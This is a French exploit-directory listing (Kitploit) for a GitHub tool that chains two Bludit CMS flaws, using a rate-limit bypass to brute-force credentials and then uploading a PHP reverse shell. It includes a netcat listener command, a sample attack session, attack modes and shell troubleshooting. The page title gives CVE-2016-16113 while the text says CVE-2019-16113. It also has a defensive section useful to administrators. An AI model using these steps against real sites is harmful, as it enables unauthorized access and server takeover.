Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
Outils/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
Password AttacksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Get RCE - Exploit pour Bludit CMS

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

Un outil d'exploitation automatisé qui combine CVE-2019-17240 (contournement d'authentification) et CVE-2019-16113 (téléchargement arbitraire de fichier) pour obtenir une exécution de code à distance sur des installations vulnérables de Bludit CMS.

⚠️ Avertissement légal

RÉSERVÉ AUX TESTS DE SÉCURITÉ AUTORISÉS

Cet outil est destiné aux professionnels de la sécurité effectuant des tests d'intrusion autorisés et aux chercheurs en sécurité agissant dans les limites légales. L'accès non autorisé à des systèmes informatiques est illégal en vertu de lois telles que le Computer Fraud and Abuse Act (CFAA) aux États-Unis et des législations similaires dans le monde entier.

En utilisant cet outil, vous acceptez :

  • De tester uniquement les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite
  • De vous conformer à toutes les lois locales, étatiques et fédérales applicables
  • D'assumer l'entière responsabilité de vos actions

L'auteur décline toute responsabilité et n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.

📋 Présentation

Cet exploit automatise le processus suivant :

  1. Vérification de la disponibilité de la cible
  2. Contournement de l'authentification par force brute (exploitant CVE-2019-17240)
  3. Téléchargement d'un reverse shell PHP malveillant (exploitant CVE-2019-16113)
  4. Établissement d'une connexion reverse shell

Détails des vulnérabilités

  • CVE-2019-17240 : Contournement d'authentification via une implémentation incorrecte de la limitation de débit (contourné par manipulation de l'en-tête X-Forwarded-For)
  • CVE-2019-16113 : Vulnérabilité de téléchargement arbitraire de fichier permettant l'exécution de code PHP malveillant

Versions concernées : Bludit CMS versions 3.9.2 et inférieures

🚀 Fonctionnalités

  • ✅ Vérification automatisée de la disponibilité de la cible
  • ✅ Contournement d'authentification par force brute
  • ✅ Capacité d'énumération des noms d'utilisateur
  • ✅ Force brute combinée nom d'utilisateur + mot de passe
  • ✅ Gestion automatique des jetons CSRF
  • ✅ Génération de charge utile reverse shell PHP
  • ✅ Téléchargement de .htaccess pour une exploitation améliorée
  • ✅ Vérification de la connexion

📦 Prérequis

  • Python 3.6+
  • Paquets Python requis :
    • requests

🔧 Installation

root@kitploit:~
# Clonez le dépôt
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Installez les dépendances
pip install -r requirements.txt

requirements.txt :

root@kitploit:~
requests>=2.25.0

💻 Utilisation

Utilisation de base

root@kitploit:~
python3 get_rce.py

Le script vous demandera :

  1. L'URL cible (ex. https://target.com)
  2. L'adresse IP de votre écouteur
  3. Le port de votre écouteur
  4. S'il faut forcer le nom d'utilisateur par force brute
  5. L'emplacement des listes de mots

Configuration de votre écouteur

Avant d'exécuter l'exploit, configurez un écouteur netcat :

root@kitploit:~
nc -lvnp 4444

Remplacez 4444 par le port de votre choix.

Exemple de session

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

Modes d'attaque

Mode 1 : Nom d'utilisateur connu + force brute sur le mot de passe

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

Mode 2 : Force brute complète des identifiants

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 Listes de mots recommandées

  • SecLists : https://github.com/danielmiessler/SecLists

    • Noms d'utilisateur : SecLists/Usernames/Names/names.txt
    • Mots de passe : SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou : /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 Fonctionnement

  1. Validation de la cible : Vérifie si la cible est accessible
  2. Contournement d'authentification :
    • Manipule l'en-tête X-Forwarded-For pour contourner la limitation de débit
    • Force brute des identifiants à l'aide des listes de mots fournies
    • Gère automatiquement les jetons CSRF
  3. Exploitation :
    • Télécharge un reverse shell PHP vers /bl-content/tmp/
    • Télécharge un fichier .htaccess pour garantir l'exécution
    • Déclenche la charge utile pour établir le reverse shell
  4. Accès au shell : Se connecte à votre écouteur

🛡️ Mesures défensives

Si vous êtes administrateur système :

  • Mettez à jour immédiatement vers Bludit 3.9.3 ou ultérieur
  • Mettez en place une limitation de débit appropriée basée sur la session, pas sur l'IP
  • Validez tous les téléchargements de fichiers (type, extension, contenu)
  • Utilisez des pare-feu d'applications web (WAF)
  • Surveillez le répertoire /bl-content/tmp/ pour les fichiers suspects
  • Appliquez des politiques de mots de passe robustes
  • Activez les mécanismes de verrouillage de compte

🐛 Dépannage

Problème : « The target seems to be down » (La cible semble inaccessible)

  • Vérifiez que l'URL est correcte et inclut le protocole (http/https)
  • Vérifiez votre connectivité réseau
  • Assurez-vous que la cible exécute bien Bludit

Problème : « Login failed » (Échec de la connexion)

  • Vérifiez que les identifiants sont corrects
  • Essayez une liste de mots plus complète
  • Vérifiez si la cible dispose de mécanismes d'authentification supplémentaires

Problème : « No shell received » (Aucun shell reçu)

  • Vérifiez que votre écouteur est en cours d'exécution
  • Vérifiez les règles de pare-feu des deux côtés
  • Assurez-vous que l'IP et le port de l'écouteur sont corrects et accessibles

🔗 Références

  • Détails CVE-2019-17240
  • Détails CVE-2019-16113
  • Site officiel de Bludit

👤 Auteur

d3vn0mi

📄 Licence

Ce projet est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Voir l'avertissement en haut de ce README.

🤝 Contribution

Les contributions, les signalements de problèmes et les demandes de fonctionnalités sont les bienvenus ! N'hésitez pas à consulter la page des issues.

⭐ Remerciements

  • La communauté des chercheurs en sécurité pour avoir découvert et documenté ces vulnérabilités
  • L'équipe Bludit pour sa réactivité dans la correction de ces problèmes
Télécharger l’outil